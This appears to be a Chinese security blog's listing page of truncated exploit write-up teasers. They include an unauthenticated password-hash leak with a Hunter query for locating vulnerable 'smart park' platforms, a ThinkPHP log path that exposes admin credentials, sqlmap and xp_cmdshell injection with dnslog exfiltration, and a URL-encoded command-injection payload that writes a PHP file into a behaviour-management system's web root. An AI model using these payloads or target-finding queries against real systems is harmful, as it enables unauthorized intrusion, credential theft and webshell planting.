主要关注网络安全方面的技术、知识和趋势,旨在为网络安全行业的发展做出贡献。
漏洞成因没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码hunter语法web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台"POCGET /admin/user_get… 漏洞成因 没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码 hunter语法 web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台" POC
开局一张图二.漏洞分析2.1 第一套源码漏洞分析2.1.1 Thinkphp日志泄漏基于Thinkphp3.2.3开发,前后台分离默认开启Debug、导致泄漏日志SQL信息、异常缓存构造Payload:App/Runtime/Logs/21_10_16.log获取泄漏的admin表账号密码进入后台2.1.2 数组可控导致RCE可上传文件名被直接带入数据包中…
记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:为了节约时间直接祭出sqlmap,-r x.txt -v 3 --random-agent --dbms=mssql --batch识别出了数据库,却被不明力量拦截了。手工尝试绕过不明力量,堆叠的方式利用xp_cmdshell尝试将命令回显从dnslog中带出来:先开x…
某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waH…
APP分发系统,杀猪盘等常用。GIT上找到源码,发现一处直接GETSHELL需要物理路径,一般可以直接报错出来,不行就测试吧~
故事起因这天风和日丽,我正在摸鱼,忽然QQ群弹出一条消息,我打开一看,我感觉不简单。如下图:扫码后发现跳转到了QQ邮箱登陆界面,确定为钓鱼网站,看到其域名为http://**kak2.cn。这里随便输入,页面跳转到如下界面。好家伙,小伙子你挺会玩啊,收集完QQ邮箱账号密码,再来收集一波个人信息,做人不能太贪心啊。开始干活!溯源钓鱼者我们现在拿到了他的域名,现在收集…